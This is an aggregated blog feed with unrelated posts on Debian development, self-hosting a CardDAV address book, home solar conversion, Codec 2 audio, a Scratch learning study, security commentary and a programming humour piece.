  • Mattia 'mapreri' Rizzolo:
    • Debian: introduce Buster.
    • Debian: explain how to migrate from squid3 (in jessie) to squid (in stretch).
  • Holger 'h01ger' Levsen:
    • Debian:
      • Add jenkins jobs to create schroots and configure pbuilder for Buster.
      • Add Buster to README/about jenkins.d.n.
      • Teach jessie and ubuntu 16.04 systems how to debootstrap Buster.
      • Only update indexes and pkg_sets every 30min as the jobs almost run for 15 min now that we test four suites (compared to three before).
      • Create HTML dashboard, live status and dd-list pages less often.
      • (Almost) stop scheduling old packages in stretch, new versions will still be scheduled and tested as usual.
      • Increase scheduling limits, especially for untested, new and depwait packages.
      • Replace Stretch with Buster in the repository comparison page.
      • Only keep build_service logs for a day, not three.
      • Add check for hanging mounts to node health checks.
      • Add check for haveged to node health checks.
      • Disable ntp.service on hosts running in the future, needed on stretch.
      • Install amd64 kernels on all i386 systems. There is a performance issue with i386 kernels, for which a bug should be filed. Installing the amd64 kernel is a sufficient workaround, but it breaks our 32/64 bit kernel variation on i386.
    • LEDE, OpenWrt: Fix up links and split TODO list.
    • Upgrade i386 systems (used for Debian) and pb3+4-amd64 (used for coreboot, LEDE, OpenWrt, NetBSD, Fedora and Arch Linux tests) to Stretch
    • jenkins: use java 8 as required by jenkins >= 2.60.1

Misc.

This week's edition was written by Ximin Luo, Holger Levsen, Bernhard M. Wiedemann, Mattia Rizzolo, Chris Lamb & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Rondam RamblingsThere's something very odd about the USS Fitzgerald incident

For a US Navy warship to allow itself to be very nearly destroyed by a civilian cargo ship virtually requires an epic career-ending screwup.  The exact nature of that screwup has yet to be determined, and the Navy is understandably staying very tight-lipped about it.  But they have said one thing on the record which is almost certainly false: that the collision happened at 2:30 AM local time:

Planet DebianColin Watson: New address book

I’ve had a kludgy mess of electronic address books for most of two decades, and have got rather fed up with it. My stack consisted of:

  • ~/.mutt/aliases, a flat text file consisting of mutt alias commands
  • lbdb configuration to query ~/.mutt/aliases, Debian’s LDAP database, and Canonical’s LDAP database, so that I can search by name with Ctrl-t in mutt when composing a new message
  • Google Contacts, which I used from Android and was completely separate from all of the above

The biggest practical problem with this was that I had the address book that was most convenient for me to add things to (Google Contacts) and the one I used when sending email, and no sensible way to merge them or move things between them. I also wasn’t especially comfortable with having all my contact information in a proprietary web service.

My goals for a replacement address book system were:

  • free software throughout
  • storage under my control
  • single common database
  • minimal manual transcription when consolidating existing databases
  • integration with Android such that I can continue using the same contacts, messaging, etc. apps
  • integration with mutt such that I can continue using the same query interface
  • not having to write my own software, because honestly

I think I have all this now!

New stack

The obvious basic technology to use is CardDAV: it’s fairly complex, admittedly, but lots of software supports it and one of my goals was not having to write my own thing. This meant I needed a CardDAV server, some way to sync the database to and from both Android and the system where I run mutt, and whatever query glue was necessary to get mutt to understand vCards.

There are lots of different alternatives here, and if anything the problem was an embarrassment of choice. In the end I just decided to go for things that looked roughly the right shape for me and tried not to spend too much time in analysis paralysis.

CardDAV server

I went with Xandikos for the server, largely because I know Jelmer and have generally had pretty good experiences with their software, but also because using Git for history of the backend storage seems like something my future self will thank me for.

It isn’t packaged in stretch, but it’s in Debian unstable, so I installed it from there.

Rather than the standalone mode suggested on the web page, I decided to set it up in what felt like a more robust way using WSGI. I installed uwsgi, uwsgi-plugin-python3, and libapache2-mod-proxy-uwsgi, and created the following file in /etc/uwsgi/apps-available/xandikos.ini which I then symlinked into /etc/uwsgi/apps-enabled/xandikos.ini:

[uwsgi]
socket = 127.0.0.1:8801
uid = xandikos
gid = xandikos
umask = 022
master = true
cheaper = 2
processes = 4
plugin = python3
module = xandikos.wsgi:app
env = XANDIKOSPATH=/srv/xandikos/collections

The port number was arbitrary, as was the path. You need to create the xandikos user and group first (adduser --system --group --no-create-home --disabled-login xandikos). I created /srv/xandikos owned by xandikos:xandikos and mode 0700, and I recommend setting a umask as shown above since uwsgi’s default umask is 000 (!). You should also run sudo -u xandikos xandikos -d /srv/xandikos/collections --autocreate and then Ctrl-c it after a short time (I think it would be nicer if there were a way to ask the WSGI wrapper to do this).

For Apache setup, I kept it reasonably simple: I ran a2enmod proxy_uwsgi, used htpasswd to create /etc/apache2/xandikos.passwd with a username and password for myself, added a virtual host in /etc/apache2/sites-available/xandikos.conf, and enabled it with a2ensite xandikos:

<VirtualHost *:443>
        ServerName xandikos.example.org
        ServerAdmin me@example.org

        ErrorLog /var/log/apache2/xandikos-error.log
        TransferLog /var/log/apache2/xandikos-access.log

        <Location />
                ProxyPass "uwsgi://127.0.0.1:8801/"
                AuthType Basic
                AuthName "Xandikos"
                AuthBasicProvider file
                AuthUserFile "/etc/apache2/xandikos.passwd"
                Require valid-user
        </Location>
</VirtualHost>

Then service apache2 reload, set the new virtual host up with Let’s Encrypt, reloaded again, and off we go.

Android integration

I installed DAVdroid from the Play Store: it cost a few pounds, but I was OK with that since it’s GPLv3 and I’m happy to help fund free software. I created two accounts, one for my existing Google Contacts database (and in fact calendaring as well, although I don’t intend to switch over to self-hosting that just yet), and one for the new Xandikos instance. The Google setup was a bit fiddly because I have two-step verification turned on so I had to create an app-specific password. The Xandikos setup was straightforward: base URL, username, password, and done.

Since I didn’t completely trust the new setup yet, I followed what seemed like the most robust option from the DAVdroid contacts syncing documentation, and used the stock contacts app to export my Google Contacts account to a .vcf file and then import that into the appropriate DAVdroid account (which showed up automatically). This seemed straightforward and everything got pushed to Xandikos. There are some weird delays in syncing contacts that I don’t entirely understand, but it all seems to get there in the end.

mutt integration

First off I needed to sync the contacts. (In fact I happen to run mutt on the same system where I run Xandikos at the moment, but I don’t want to rely on that, and going through the CardDAV server means that I don’t have to poke holes for myself using filesystem permissions.) I used vdirsyncer for this. In ~/.vdirsyncer/config:

[general]
status_path = "~/.vdirsyncer/status/"

[pair contacts]
a = "contacts_local"
b = "contacts_remote"
collections = ["from a", "from b"]

[storage contacts_local]
type = "filesystem"
path = "~/.contacts/"
fileext = ".vcf"

[storage contacts_remote]
type = "carddav"
url = "<Xandikos base URL>"
username = "<my username>"
password = "<my password>"

Running vdirsyncer discover and vdirsyncer sync then synced everything into ~/.contacts/. I added an hourly crontab entry to run vdirsyncer -v WARNING sync.

Next, I needed a command-line address book tool based on this. khard looked about right and is in stretch, so I installed that. In ~/.config/khard/khard.conf (this is mostly just the example configuration, but I preferred to sort by first name since not all my contacts have neat first/last names):

[addressbooks]
[[contacts]]
path = ~/.contacts/<UUID of my contacts collection>/

[general]
debug = no
default_action = list
editor = vim
merge_editor = vimdiff

[contact table]
# display names by first or last name: first_name / last_name
display = first_name
# group by address book: yes / no
group_by_addressbook = no
# reverse table ordering: yes / no
reverse = no
# append nicknames to name column: yes / no
show_nicknames = no
# show uid table column: yes / no
show_uids = yes
# sort by first or last name: first_name / last_name
sort = first_name

[vcard]
# extend contacts with your own private objects
# these objects are stored with a leading "X-" before the object name in the vcard files
# every object label may only contain letters, digits and the - character
# example:
#   private_objects = Jabber, Skype, Twitter
private_objects = Jabber, Skype, Twitter
# preferred vcard version: 3.0 / 4.0
preferred_version = 3.0
# Look into source vcf files to speed up search queries: yes / no
search_in_source_files = no
# skip unparsable vcard files: yes / no
skip_unparsable = no

Now khard list shows all my contacts. So far so good. Apparently there are some awkward vCard compatibility issues with creating or modifying contacts from the khard end. I’ve tried adding one address from ~/.mutt/aliases using khard and it seems to at least minimally work for me, but I haven’t explored this very much yet.

I had to install python3-vobject 0.9.4.1-1 from experimental to fix eventable/vobject#39 saving certain vCard files.

Finally, mutt integration. I already had set query_command="lbdbq '%s'" in ~/.muttrc, and I wanted to keep that in place since I still wanted to use LDAP querying as well. I had to write a very small amount of code for this (perhaps I should contribute this to lbdb upstream?), in ~/.lbdb/modules/m_khard:

#! /bin/sh

m_khard_query () {
    khard email --parsable --remove-first-line --search-in-source-files "$1"
}

My full ~/.lbdb/rc now reads as follows (you probably won’t want the LDAP stuff, but I’ve included it here for completeness):

MODULES_PATH="$MODULES_PATH $HOME/.lbdb/modules"
METHODS='m_muttalias m_khard m_ldap'
LDAP_NICKS='debian canonical'

Next steps

I’ve deleted one account from Google Contacts just to make sure that everything still works (e.g. I can still search for it when composing a new message), but I haven’t yet deleted everything. I won’t be adding anything new there though.

I need to push everything from ~/.mutt/aliases into the new system. This is only about 30 contacts so shouldn’t take too long.

Overall this feels like a big improvement! It wasn’t a trivial amount of setup for just me, but it means I have both better usability for myself and more independence from proprietary services, and I think I can add extra users with much less effort if I need to.

Postscript

A day later and I’ve consolidated all my accounts from Google Contacts and ~/.mutt/aliases into the new system, with the exception of one group that I had defined as a mutt alias and need to work out what to do with. This all went smoothly.

I’ve filed the new lbdb module as #866178, and the python3-vobject bug as #866181.

CryptogramFighting Leakers at Apple

Apple is fighting its own battle against leakers, using people and tactics from the NSA.

According to the hour-long presentation, Apple's Global Security team employs an undisclosed number of investigators around the world to prevent information from reaching competitors, counterfeiters, and the press, as well as hunt down the source when leaks do occur. Some of these investigators have previously worked at U.S. intelligence agencies like the National Security Agency (NSA), law enforcement agencies like the FBI and the U.S. Secret Service, and in the U.S. military.

The information is from an internal briefing, which was leaked.

Worse Than FailureNot so DDoS

Joe K was a developer at a company that provided a SaaS Natural Language Processing system. As Chief Engineer of the Data Science Team (a term that make him feel like some sort of mad professor), his duties included coding the Data Science Service. It provided the back-end for handling the complex, heavy-lifting type of processing that had to happen in real-time. Since it was very CPU-intensive, Joe spent a lot of time trying to battle latency. But that was the least of his problems.

Ddos-attack-ex

The rest of the codebase was a cobbled-together mess that had been coded by the NLP researchers- scientists with no background in programming or computer science. Their mantra was “If it gets us the results we need, who cares how it looks behind the scenes?” This meant Joe’s well-designed data service somehow had to interface with applications made from a pile of ugly hacks. It was difficult at times, but he managed to get the job done while also keeping CPU usage to a minimum.

One day Joe was working away when Burt, the company CEO, burst in to their humble basement computer lab in an obvious tizzy. Burt rarely visited the “egghead dungeon”, as he called it, so something had to be amiss. “JOE!” he cried out. “The production data science service is completely down! Every customer we have gave me an angry call within the last ten minutes!”

Considering this was an early-stage startup with only five customers, Burt’s assertion was probably true, if misleading. “Wow, ok Burt. Let me get right on that!” Joe offered, feeling flustered. He took a look at the error logging service and there was nothing to be found. He then attempted to SSH to each of the production servers, with success. He decided to check performance on the servers and an entire string of red flags shot straight up the proverbial flag pole. Every production server was at 100% CPU usage.

“I have an effect for you, Burt, but not a cause. I’ll have to dig deeper but it almost seems like… a Denial of Service attack?” Joe offered, not believing that would actually be the case. With only five whitelisted customers able to connect, all of them using the NLP system to its fullest shouldn’t come even close to causing this.

While looking further at the server logs, Joe got an instant message from Xander, the software engineer who worked on the dashboards, “Hey Joe, I noticed prod was down… could it be related to something I’m doing?”

“Ummm… maybe? What is it you are doing exactly?” Joe replied, with a new sense of concern. Xander’s dashboard shouldn’t have any interaction with the DSS, so it seemed like an odd question. Requests to the NLP site would initially come to a front-end server, and if there was some advanced analysis that needed to happen, that server would RPC to the DSS. After the response was computed, the front-end server would log the request and response to the Xander’s dashboard system so it could monitor usage stats.

“Well, the dashboard is out of sync,” Xander explained. There had been a bug causing events to not make it to the dashboard system for the past month. They would need to be added to make the dashboard accurate. This could have been a simple change to the dashboard’s database, but instead Xander decided to replay all of the actual HTTP requests to the front end. Many of those requests triggered processing on the DSS- processing which had already been done. And since it was taking a long time, Xander had batched up the resent requests and was running them from three different machines, thus providing a remarkably good simulation of a DDoS.

“STOP YOUR PROCESS IMMEDIATELY AND DO THIS THE RIGHT WAY!” Joe shot back, all caps intended.

“Ok, ok, sorry. I’ll get this cleaned up,” Xander assured Joe. Within 15 minutes, the server CPU usage returned to normal levels and everything was great again. Joe was able to get Burt off his back and return to his normal duties.

A few minutes later, Joe’s IM dinged again with a message from Xander. "Hey Joe, sorry about that, LOL. But are we 100% sure that was the problem? Should I do it again just to be sure?

If there was a way for Joe to use instant messaging to send a virtual strangulation to Xander, he would have done it. But a “HELL NO!!!” would have to suffice.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet DebianJoey Hess: 12 to 24 volt house conversion

Upgrading my solar panels involved switching the house from 12 volts to 24 volts. No reasonably priced charge controllers can handle 1 KW of PV at 12 volts.

There might not be a lot of people who need to do this; entirely 12 volt offgrid houses are not super common, and most upgrades these days probably involve rooftop microinverters and so would involve a switch from DC to AC. I did not find a lot of references online for converting a whole house's voltage from 12V to 24V.

To prepare, I first checked that all the fuses and breakers were rated for > 24 volts. (Actually, > 30 volts because it will be 26 volts or so when charging.) Also, I checked for any shady wiring, and verified that all the wires I could see in the attic and wiring closet were reasonably sized (10AWG) and in good shape.

Then I:

  1. Turned off every light, unplugged every plug, pulled every fuse and flipped every breaker.
  2. Rewired the battery bank from 12V to 24V.
  3. Connected the battery bank to the new charge controller.
  4. Engaged the main breaker, and waited for anything strange.
  5. Screwed in one fuse at a time.

lighting

The house used all fluorescent lights, and they have ballasts rated for only 12V. While they work at 24V, they might blow out sooner or overheat. In fact one died this evening, and while it was flickering before, I suspect the 24V did it in. It makes sense to replace them with more efficient LED lights anyway. I found some 12-24V DC LED lights for regular screw-in (edison) light fixtures. Does not seem very common; Amazon only had a few models and they shipped from China.

Also, I ordered a 15 foot long, 300 LED strip light, which runs on 24V DC and has an adhesive backing. Great stuff -- it can be cut to different lengths and stuck anywhere. I installed some underneath the cook stove hood and the kitchen cabinets, which didn't have lights before.

Similar LED strips are used in some desktop lamps. My lamp was 12V only (barely lit at 24V), but I was able to replace its LED strip, upgrading it to 24V and three times as bright.

(Christmas lights are another option; many LED christmas lights run on 24V.)

appliances

My Lenovo laptop's power supply that I use in the house is a vehicle DC-DC converter, and is rated for 12-24V. It seems to be running fine at 26V, did not get warm even when charging the laptop up from empty.

I'm using buck converters to run various USB powered (5V) ARM boxes such as my sheevaplug. They're quarter sized, so fit anywhere, and are very efficient.

My satellite internet receiver is running with a large buck converter, feeding 12V to an inverter, feeding to a 30V DC power supply. That triple conversion is inneficient, but it works for now.

The ceiling fan runs on 24V, and does not seem to run much faster than on 12V. It may be rated for 12-24V. Can't seem to find any info about it.

The radio is a 12V car radio. I used a LM317 to run it on 24V, to avoid the RF interference a buck converter would have produced. This is a very inneficient conversion; half of the power is wasted as heat. But since I can stream internet radio all day now via satellite, I'll not use the FM radio very often.

Fridge... still running on propane for now, but I have an idea for a way to build a cold storage battery that will use excess power from the PV array, and keep a fridge at a constant 34 degrees F. Next home improvement project in the queue.

Planet DebianBenjamin Mako Hill: Learning to Code in One’s Own Language

I recently published a paper with Sayamindu Dasgupta that provides evidence in support of the idea that kids can learn to code more quickly when they are programming in their own language.

Millions of young people from around the world are learning to code. Often, during their learning experiences, these youth are using visual block-based programming languages like Scratch, App Inventor, and Code.org Studio. In block-based programming languages, coders manipulate visual, snap-together blocks that represent code constructs instead of textual symbols and commands that are found in more traditional programming languages.

The textual symbols used in nearly all non-block-based programming languages are drawn from English—consider “if” statements and “for” loops for common examples. Keywords in block-based languages, on the other hand, are often translated into different human languages. For example, depending on the language preference of the user, an identical set of computing instructions in Scratch can be represented in many different human languages:

Examples of a short piece of Scratch code shown in four different human languages: English, Italian, Norwegian Bokmål, and German.

Although my research with Sayamindu Dasgupta focuses on learning, both Sayamindu and I worked on local language technologies before coming back to academia. As a result, we were both interested in how the increasing translation of programming languages might be making it easier for non-English speaking kids to learn to code.

After all, a large body of education research has shown that early-stage education is more effective when instruction is in the language that the learner speaks at home. Based on this research, we hypothesized that children learning to code with block-based programming languages translated to their mother-tongues will have better learning outcomes than children using the blocks in English.

We sought to test this hypothesis in Scratch, an informal learning community built around a block-based programming language. We were helped by the fact that Scratch is translated into many languages and has a large number of learners from around the world.

To measure learning, we built on some of our our own previous work and looked at learners’ cumulative block repertoires—similar to a code vocabulary. By observing a learner’s cumulative block repertoire over time, we can measure how quickly their code vocabulary is growing.

Using this data, we compared the rate of growth of cumulative block repertoire between learners from non-English speaking countries using Scratch in English to learners from the same countries using Scratch in their local language. To identify non-English speakers, we considered Scratch users who reported themselves as coming from five primarily non-English speaking countries: Portugal, Italy, Brazil, Germany, and Norway. We chose these five countries because they each have one very widely spoken language that is not English and because Scratch is almost fully translated into that language.

Even after controlling for a number of factors like social engagement on the Scratch website, user productivity, and time spent on projects, we found that learners from these countries who use Scratch in their local language have a higher rate of cumulative block repertoire growth than their counterparts using Scratch in English. This faster growth was despite having a lower initial block repertoire. The graph below visualizes our results for two “prototypical” learners who start with the same initial block repertoire: one learner who uses the English interface, and a second learner who uses their native language.

Summary of the results of our model for two prototypical individuals.

Our results are in line with what theories of education have to say about learning in one’s own language. Our findings also represent good news for designers of block-based programming languages who have spent considerable amounts of effort in making their programming languages translatable. It’s also good news for the volunteers who have spent many hours translating blocks and user interfaces.

Although we find support for our hypothesis, we should stress that our findings are both limited and incomplete. For example, because we focus on estimating the differences between Scratch learners, our comparisons are between kids who all managed to successfully use Scratch. Before Scratch was translated, kids with little working knowledge of English or the Latin script might not have been able to use Scratch at all. Because of translation, many of these children are now able to learn to code.


This blog post and the work that it describes is a collaborative project with Sayamindu Dasgupta. Sayamindu also published a very similar version of the blog post in several places. Our paper is open access and you can read it here. The paper was published in the proceedings of the ACM Learning @ Scale Conference. We also recently gave a talk about this work at the International Communication Association’s annual conference. We received support and feedback from members of the Scratch team at MIT (especially Mitch Resnick and Natalie Rusk), as well as from Nathan TeBlunthuis at the University of Washington. Financial support came from the US National Science Foundation.

,

Planet Linux AustraliaDavid Rowe: Codec 2 Wideband

I’m spending a month or so improving the speech quality of a couple of Codec 2 modes. I have two aims:

  1. Make the 700 bit/s codec sound better, to improve speech quality on low SNR HF channels (beneath 0dB).
  2. Develop a higher quality mode in the 2000 to 3000 bit/s range, that can be used on HF channels with modest SNRs (around 10dB)

I ran some numbers on the new OFDM modem and LDPC codes, and turns out we can get 3000 bit/s of codec data through a 2000 Hz channel at down to 7dB SNR.

Now 3000 bit/s is broadband for me – I’ve spent years being very frugal with my bits while I play in low SNR HF land. However it’s still a bit low for Opus which kicks in at 6000 bit/s. I can’t squeeze 6000 bit/s through a 2000 Hz RF channel without higher order QAM constellations which means SNRs approaching 20dB.

So – what can I do with 3000 bit/s and Codec 2? I decided to try wideband(-ish) audio – the sort of audio bandwidth you get from Skype or AM broadcast radio. So I spent a few weeks modifying Codec 2 to work at 16 kHz sample rate, and Jean Marc gave me a few tips on using DCTs to code the bits.

It’s early days but here are a few samples:

Description Sample
1 Original Speech Listen
2 Codec 2 Model, orignal amplitudes and phases Listen
3 Synthetic phase, one bit voicing, original amplitudes Listen
4 Synthetic phase, one bit voicing, amplitudes at 1800 bit/s Listen
5 Simulated analog SSB, 300-2600Hz BPF, 10dB SNR Listen

Couple of interesting points:

  • Sample (2) is as good as Codec 2 can do, its the unquantised model parameters (harmonic phases and amplitudes). It’s all down hill from here as we quantise or toss away parameters.
  • In (3) I’m using a one bit voicing model, this is very vocoder and shouldn’t work this well. MBE/MELP all say you need mixed excitation. Exploring that conundrum would be a good Masters degree topic.
  • In (3) I can hear the pitch estimator making a few mistakes, e.g. around “sheet” on the female.
  • The extra 4kHz of audio bandwidth doesn’t take many more bits to encode, as the ear has a log frequency response. It’s maybe 20% more bits than 4kHz audio.
  • You can hear some words like “well” are muddy and indistinct in the 1800 bit/s sample (4). This usually means the formants (spectral) peaks are not well defined, so we might be tossing away a little too much information.
  • The clipping on the SSB sample (5) around the words “depth” and “hours” is an artifact of the PathSim AGC. But dat noise. It gets really fatiguing after a while.

Wideband audio is a big paradigm shift for Push To Talk (PTT) radio. You can’t do this with analog radio: 2000 Hz of RF bandwidth, 8000 Hz of audio bandwidth. I’m not aware of any wideband PTT radio systems – they all work at best 4000 Hz audio bandwidth. DVSI has a wideband codec, but at a much higher bit rate (8000 bits/s).

Current wideband codecs shoot for artifact-free speech (and indeed general audio signals like music). Codec 2 wideband will still have noticeable artifacts, and probably won’t like music. Big question is will end users prefer this over SSB, or say analog FM – at the same SNR? What will 8kHz audio sound like on your HT?

We shall see. I need to spend some time cleaning up the algorithms, chasing down a few bugs, and getting it all into C, but I plan to be testing over the air later this year.

Let me know if you want to help.

Play Along

Unquantised Codec 2 with 16 kHz sample rate:

$ ./c2sim ~/Desktop/c2_hd/speech_orig_16k.wav --Fs 16000 -o - | play -t raw -r 16000 -s -2 -

With “Phase 0” synthetic phase and 1 bit voicing:

$ ./c2sim ~/Desktop/c2_hd/speech_orig_16k.wav --Fs 16000 --phase0 --postfilter -o - | play -t raw -r 16000 -s -2 -

Links

FreeDV 2017 Road Map – this work is part of the “Codec 2 Quality” work package.

Codec 2 page – has an explanation of the way Codec 2 models speech with harmonic amplitudes and phases.

Planet DebianNiels Thykier: debhelper 10.5.1 now available in unstable

Earlier today, I uploaded debhelper version 10.5.1 to unstable.  The following are some highlights compared to version 10.2.5:

  • debhelper now supports the “meson+ninja” build system. Kudos to Michael Biebl.
  • Better cross building support in the “makefile” build system (PKG_CONFIG is set to the multi-arched version of pkg-config). Kudos to Helmut Grohne.
  • New dh_missing helper to take over dh_install –list-missing/–fail-missing while being able to see files installed from other helpers. Kudos to Michael Stapelberg.
  • dh_installman now logs what files it has installed so the new dh_missing helper can “see” them as installed.
  • Improve documentation (e.g. compare and contrast the dh_link config file with ln(1) to assist people who are familiar with ln(1))
  • Avoid triggering a race-condition with libtool by ensuring that dh_auto_install run make with -j1 when libtool is detected (see Debian bug #861627)
  • Optimizations and parallel processing (more on this later)

There are also some changes to the upcoming compat 11

  • Use “/run” as “run state dir” for autoconf
  • dh_installman will now guess the language of a manpage from the path name before using the extension.

 


Filed under: Debhelper, Debian

Planet DebianJoey Hess: DIY solar upgrade complete-ish

Success! I received the Tracer4215BN charge controller where UPS accidentially-on-purpose delivered it to a neighbor, and got it connected up, and the battery bank rewired to 24V in a couple hours.

charge controller reading 66.1V at 3.4 amps on panels, charging battery at 29.0V at 7.6A

Here it's charging the batteries at 220 watts, and that picture was taken at 5 pm, when the light hits the panels at nearly a 90 degree angle. Compare with the old panels, where the maximum I ever recorded at high noon was 90 watts. I've made more power since 4:30 pm than I used to be able to make in a day! \o/

Planet DebianAlexander Wirt: Stretch Backports available

With the release of stretch we are pleased to open the doors for stretch-backports and jessie-backports-sloppy. \o/

As usual with a new release we will change a few things for the backports service.

What to upload where

As a reminder, uploads to a release-backports pocket are to be taken from release + 1, uploads to a release-backports-sloppy pocket are to be taken from release + 2. Which means:

Source Distribution Backports Distribution Sloppy Distribution
buster stretch-backports jessie-backports-sloppy
stretch jessie-backports -

Deprecation of LTS support for backports

We started supporting backports as long as there is LTS support as an experiment. Unfortunately it didn’t worked, most maintainers didn’t wanted to support oldoldstable-backports (squeeze) for the lifetime of LTS. So things started to rot in squeeze and most packages didn’t received updates. After long discussions we decided to deprecate LTS support for backports. From now on squeeze-backports(-sloppy) is closed and will not receive any updates. Expect it to get removed from the mirrors and moved to archive in the near future.

BSA handling

We - the backports team - didn’t scale well in processing BSA requests. To get things better in the future we decided to change the process a little bit. If you upload a package which fixes security problems please fill out the BSA template and create a ticket in the rt tracker (see https://backports.debian.org/Contribute/#index3h2 for details).

Stretching the rules

From time to time its necessary to not follow the backports rules, like a package needs to be in testing or a version needs to be in Debian. If you think you have one of those cases, please talk to us on the list before upload the package.

Thanks

Thanks have to go out to all people making backports possible, and that includes up front the backporters themself who do upload the packages, track and update them on a regular basis, but also the buildd team making the autobuilding possible and the ftp masters for creating the suites in the first place.

We wish you a happy stretch :) Alex, on behalf of the Backports Team

CryptogramSeparating the Paranoid from the Hacked

Sad story of someone whose computer became owned by a griefer:

The trouble began last year when he noticed strange things happening: files went missing from his computer; his Facebook picture was changed; and texts from his daughter didn't reach him or arrived changed.

"Nobody believed me," says Gary. "My wife and my brother thought I had lost my mind. They scheduled an appointment with a psychiatrist for me."

But he built up a body of evidence and called in a professional cybersecurity firm. It found that his email addresses had been compromised, his phone records hacked and altered, and an entire virtual internet interface created.

"All my communications were going through a man-in-the-middle unauthorised server," he explains.

It's the "psychiatrist" quote that got me. I regularly get e-mails from people explaining in graphic detail how their whole lives have been hacked. Most of them are just paranoid. But a few of them are probably legitimate. And I have no way of telling them apart.

This problem isn't going away. As computers permeate even more aspects of our lives, it's going to get even more debilitating. And we don't have any way, other than hiring a "professional cybersecurity firm," of telling the paranoids from the victims.

Planet DebianJonathan Dowland: Coming in from the cold

I've been using a Mac day-to-day since around 2014, initially as a refreshing break from the disappointment I felt with GNOME3, but since then a few coincidences have kept me on the platform. Something happened earlier in the year that made me start to think about a move back to Linux on the desktop. My next work hardware refresh is due in March next year, which gives me about nine months to "un-plumb" myself from the Mac ecosystem. From the top of my head, here's the things I'm going to have to address:

  • the command modifier key (⌘). It's a small thing but its use on the Mac platform is very consistent, and since it's not used at all within terminals, there's never a clash between window management and terminal applications. Compared to the morass of modifier keys on Linux, I will miss it. It's possible if I settle on a desktop environment and spend some time configuring it I can get to a similarly comfortable place. Similarly, I'd like to stick to one clipboard, and if possible, ignore the select-to-copy, middle-click-to-paste one entirely. This may be an issue for older software.

  • The Mac hardware trackpad and gestures are honestly fantastic. I still have some residual muscle memory of using the Thinkpad trackpoint, and so I'm weaning myself off the trackpad by using an external thinkpad keyboard with the work Mac, and increasingly using a x61s where possible.

  • SizeUp. I wrote about this in useful mac programs. It's a window management helper that lets you use keyboard shortcuts to move move and resize windows. I may need something similar, depending on what desktop environment I settle on. (I'm currently evaluating Awesome WM).

  • 1Password. These days I think a password manager is an essential piece of software, and 1Password is a very, very good example of one. There are several other options now, but sadly none that seem remotely as nice as 1Password. Ryan C Gordon wrote 1pass, a Linux-compatible tool to read a 1Password keychain, but it's quite raw and needs some love. By coincidence that's currently his focus, and one can support him in this work via his Patreon.

  • Font rendering. Both monospace and regular fonts look fantastic out of the box on a Mac, and it can be quite hard to switch back and forth between a Mac and Linux due to the difference in quality. I think this is a mixture of ensuring the font rendering software on Linux is configured properly, but also that I install a reasonable selection of fonts.

I think that's probably it: not a big list! Notably, I'm not locked into iTunes, which I avoid where possible; Apple's Photo app (formerly iPhoto) which is a bit of a disaster; nor Time Machine, which is excellent, but I have a backup system for other things in place that I can use.

CryptogramThe FAA Is Arguing for Security by Obscurity

In a proposed rule by the FAA, it argues that software in an Embraer S.A. Model ERJ 190-300 airplane is secure because it's proprietary:

In addition, the operating systems for current airplane systems are usually and historically proprietary. Therefore, they are not as susceptible to corruption from worms, viruses, and other malicious actions as are more-widely used commercial operating systems, such as Microsoft Windows, because access to the design details of these proprietary operating systems is limited to the system developer and airplane integrator. Some systems installed on the Embraer Model ERJ 190-300 airplane will use operating systems that are widely used and commercially available from third-party software suppliers. The security vulnerabilities of these operating systems may be more widely known than are the vulnerabilities of proprietary operating systems that the avionics manufacturers currently use.

Longtime readers will immediately recognize the "security by obscurity" argument. Its main problem is that it's fragile. The information is likely less obscure than you think, and even if it is truly obscure, once it's published you've just lost all your security.

This is me from 2014, 2004, and 2002.

The comment period for this proposed rule is ongoing. If you comment, please be polite -- they're more likely to listen to you.

Worse Than FailureCodeSOD: Plurals Dones Rights

Today, submitter Adam shows us how thoughtless language assumptions made by programmers are also hilarious language assumptions:

"So we're querying a database for data matching *title* but then need to try again with plural/singular if we didn't get anything. Removing the trailing S is bad, but what really caught my eye was how we make a word plural. Never mind any English rules or if the word is actually Greek, Chinese, or Klingon."


if ((locs == NULL || locs->Length() == 0) && (title->EndsWith(@"s") || title->EndsWith(@"S")))
{
    title->RemoveCharAt(title->Length()-1);
    locs = data->GetLocationsForWord(title);
}
else if ((locs == NULL || locs->Length() == 0) && title->Length() > 0)
{
    WCHAR c = title->CharAt(title->Length()-1);
    if (c >= 'A' && c <= 'Z')
    {
        title->Append(@"S");
    }
    else
    {
        title->Append(@"s");
    }
    locs = data->GetLocationsForWord(title);
}

Untils nexts times: ευχαριστώs &s 再见s, Hochs!

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

Planet Linux AustraliaOpenSTEM: Guess the Artefact! – #2

Today’s Guess the Artefact! covers one of a set of artefacts which are often found confusing to recognise. We often get questions about these artefacts, from students and teachers alike, so here’s a chance to test your skills of observation. Remember – all heritage and archaeological material is covered by State or Federal legislation and should never be removed from its context. If possible, photograph the find in its context and then report it to your local museum or State Heritage body (the Dept of Environment and Heritage Protection in Qld; the Office of Environment and Heritage in NSW; the Dept of Environment, Planning and Sustainable Development in ACT; Heritage Victoria; the Dept of Environment, Water and Natural Resources in South Australia; the State Heritage Office in WA and the Heritage Council – Dept of Tourism and Culture in NT).

This artefact is made of stone. It measures about 12 x 8 x 3 cm. It fits easily and comfortably into an adult’s hand. The surface of the stone is mostly smooth and rounded, it looks a little like a river cobble. However, one side – the right-hand side in the photo above – is shaped so that 2 smooth sides meet in a straight, sharpish edge. Such formations do not occur on naturally rounded stones, which tells us that this was shaped by people and not just rounded in a river. The smoothed edges meeting in a sharp edge tell us that this is ground-stone technology. Ground stone technology is a technique used by people to create smooth, sharp edges on stones. People grind the stone against other rocks, occasionally using sand and water to facilitate the process, usually in a single direction. This forms a smooth surface which ends in a sharp edge.

Neolithic Axe

Ground stone technology is usually associated with the Neolithic period in Europe and Asia. In the northern hemisphere, this technology was primarily used by people who were learning to domesticate plants and animals. These early farmers learned to grind grains, such as wheat and barley, between two stones to make flour – thus breaking down the structure of the plant and making it easier to digest. Our modern mortar and pestle is a descendant of this process. Early farmers would have noticed that these actions produced smooth and sharp edges on the stones. These observations would have led them to apply this technique to other tools which they used and thus develop the ground-stone technology. Here (picture on right) we can see an Egyptian ground stone axe from the Neolithic period. The toolmaker has chosen an attractive red and white stone to make this axe-head.

